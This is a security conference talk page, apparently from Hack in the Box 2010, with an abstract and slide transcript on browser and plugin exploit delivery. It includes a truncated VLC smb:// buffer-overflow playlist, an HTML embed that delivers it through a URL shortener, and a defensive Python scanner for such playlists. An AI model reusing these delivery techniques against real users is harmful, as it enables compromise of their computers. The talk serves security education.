W.E.B. 2010 - Web, Exploits, Browsers
My talk at Hack in the Box 2010 - Kuala Lumpur

It has been a decade since I started talking about computer security. Ten years have witnessed a change in threat landscapes, attack targets, exploits, techniques and damage. Two ecosystems are slowly and surely converging into one. On one hand, we have the application layer. Much has been said about it. There is a steady trickling flow of XSS, XSRF, SQL injection and the usual suspects. Some of them come under the guise of "Web 2.0", and some of them are as ancient as the CGI attacks of 1999. On the other hand, we have the desktop. Dominating the desktop is the browser, with its horde of assistants. Exploitation in this space has accelerated in the last 3 years.

How will the threat landscape change with the advent of new technologies and services? New standards are emerging, and the darling child of the web is HTML 5. A closer look at the standards reveals an awful mess. Are the standards mitigating any security concerns? More importantly, will browser vendors and web application developers really respect the standards? The browser wars taught us that "might is right". If everyone breaks the web, that becomes the newly adopted standard. New technologies, coupled with popular online services, make for some very interesting exploit delivery techniques.

This talk explores some innovative exploit delivery techniques that are born as a result of bloated standards and services designed without much thought towards security. We cover techniques where exploits can be delivered through URL shorteners and images. We take a look at some browser exploits. The talk ends with a discussion on exploit sophistication, ranging from highly polished and elegant techniques such as Return Oriented Programming to the downright crude and ugly techniques such as DLL Hijacking. How will we combine all this together? And will Anti-Virus still save us all?

  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities, the latest being the command exec vuln in Java Web Start. QuickTime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash sprays.
  • URL shorteners can host an entire exploit.
  • 800+ JavaScript events, video, and more.
  • Sandboxing isn't the solution.

Presentation Transcript

  • W.E.B. 2010 - Web . Exploits . Browsers
    Saumil Shah
    Hack in the Box - Kuala Lumpur 2010
  • # who am i
    Saumil Shah, CEO Net-square
    LinkedIn: saumilshah
  • LOOK AT ALL THE COOL STUFF!!
  • 33% MORE!
  • With JIT! Fights DEP, ASLR!
  • Worldwide coverage,
    Hides your tracks.
  • ...as never seen before!
  • GUARANTEED!!
    Fresh new bugs,
    Present on most computers
  • I can haz sandbox
    I Also Can!
  • IM IN UR BASE
    KILLING UR D00DZ
    Sploit Time!
  • See no EVAL
    CVE 2010-2883
    (0+1)day exploit
    Obfuscated JavaScript decoded without using eval, document.write, etc.
  • Who you gonna call?
  • howstuffworks - Anti Virus
    YER NOT ON THE LIST! COME ON IN.
  • howstuffworks - Anti Virus
    These are not the sploitz you're looking for.
  • 0-day to the Face!
    "To get our new signature files you need a valid support plan."
  • ...and keep on patching
  • W3C
    "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
  • Application Delivery
    The Web
    at present
    Authentication
    Statefulness
    Data Typing
    Non-mutable
    HTTP
    HTML
    AJAX
    Flash
    Sandbox
    HTML5
    Anti-XSS
    WAF
    Silverlight
    Web sockets
    MIND THE GAP
  • Sploit Time!
  • Making the impossible possible
    smb:// mrl buffer overflow
  • VLC smb:// overflow - playlist
    <?xml version="1.0" encoding="UTF-8"?>
    <playlist version="1"
              xmlns="http://xspf.org/ns/0/"
              xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
      <title>Playlist</title>
      <trackList>
        <track>
          <location>
            smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
          </location>
          <extension application="http://www.videolan.org/vlc/playlist/0">
            <vlc:id>0</vlc:id>
          </extension>
        </track>
      </trackList>
    </playlist>
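A defender-side check for the playlist vector on this slide, added here as example code that is not from the talk: it parses an XSPF playlist and flags location entries shaped like the oversized smb:// MRL above (risky scheme, excessive length, long padding runs, user@host with a non-routable host). The sample playlist, the length threshold and the scheme list are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
XSPF_NS = "{http://xspf.org/ns/0/}"

# Constructed sample modelled on the slide: the smb:// location carries an
# oversized fragment (600 bytes here; the real payload is far longer).
SAMPLE_XSPF = """<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/"
          xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track><location>smb://example.com@0.0.0.0/foo/#%s</location></track>
    <track><location>http://media.example.net/clip.mp4</location></track>
  </trackList>
</playlist>""" % ("A" * 600)

MAX_MRL_LEN = 512          # assumed threshold; tune for your environment
RISKY_SCHEMES = {"smb"}    # schemes whose parser the talk shows being overflowed

def check_location(mrl):
    """Return a list of reasons a media resource locator looks suspicious."""
    reasons = []
    parts = urlsplit(mrl)
    if parts.scheme in RISKY_SCHEMES:
        reasons.append("risky scheme %s://" % parts.scheme)
    if len(mrl) > MAX_MRL_LEN:
        reasons.append("oversized MRL (%d bytes)" % len(mrl))
    # long runs of a single character are typical overflow padding
    if re.search(r"(.)\1{63,}", mrl):
        reasons.append("64+ byte run of a repeated character")
    # user@host with a bogus host: scheme abuse rather than a real share
    if parts.username and parts.hostname in ("0.0.0.0", None):
        reasons.append("user@host form with a non-routable host")
    return reasons

def scan_xspf(xml_text):
    """Parse an XSPF playlist; return {location: [reasons]} for flagged tracks."""
    root = ET.fromstring(xml_text)
    findings = {}
    for loc in root.iter(XSPF_NS + "location"):
        mrl = (loc.text or "").strip()
        reasons = check_location(mrl)
        if reasons:
            findings[mrl] = reasons
    return findings

if __name__ == "__main__":
    for mrl, why in scan_xspf(SAMPLE_XSPF).items():
        print(mrl[:48] + "...", why)
```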
  • ...just add bit.ly
    smb:// mrl buffer overflow
  • 100% Pure Alphanum!
  • VLC smb overflow - HTMLized!!
    <embed type="application/x-vlc-plugin"
    width="320" height="200"
    target="http://tinyurl.com/ycctrzf"
    id="vlc" />
    I'm in ur browser....
    ...blowin up ur g00dz
    pwn
  • I'm an evil Javascript
    I'm an innocent image
  • EET - Exploit Enabler Technology
    <canvas>
  • The Solution?
    HTML 8.0
    HTTP 2.0
    Browser Security Model
    Self Contained Apps
  • shoutz...
    L33tdawg, Amy, cbelinda
    KUL volunteerz
    NL crew
    Paul Vixie
  • kthxbai
    www.net-square.com
    secure . automate . innovate